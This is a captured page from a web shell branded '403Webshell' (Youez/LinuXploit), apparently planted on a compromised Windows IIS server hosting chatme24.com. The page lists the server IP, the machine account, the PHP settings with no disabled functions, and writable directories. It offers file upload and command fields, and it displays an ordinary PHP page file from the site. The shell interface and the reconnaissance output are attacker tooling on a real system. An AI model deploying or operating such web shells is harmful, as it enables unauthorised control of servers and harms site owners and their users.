403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/_server/city_js/dev/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot/_server/city_js/dev/index.php
<?php
$g['mobile_redirect_off'] = true;
include('../../../_include/core/main_start.php');

class CCityIndex extends CHtmlBlock
{
    function parseBlock(&$html)
    {
        $urlFiles = Common::getOption('url_files_city', 'path');
        $html->setvar('path_pano', $urlFiles . 'city/pano_cache/');

        $keyMap = CityMap::getKeyMap();
        $html->setvar('google_maps_api_key', $keyMap);
        $html->setvar('param_google_maps_api_key', $keyMap ? "?key={$keyMap}" : '');

        parent::parseBlock($html);
    }
}

$page = new CCityIndex('', 'index.html');

include('../../../_include/core/main_close.php');

Youez - 2016 - github.com/yon3zu
LinuXploit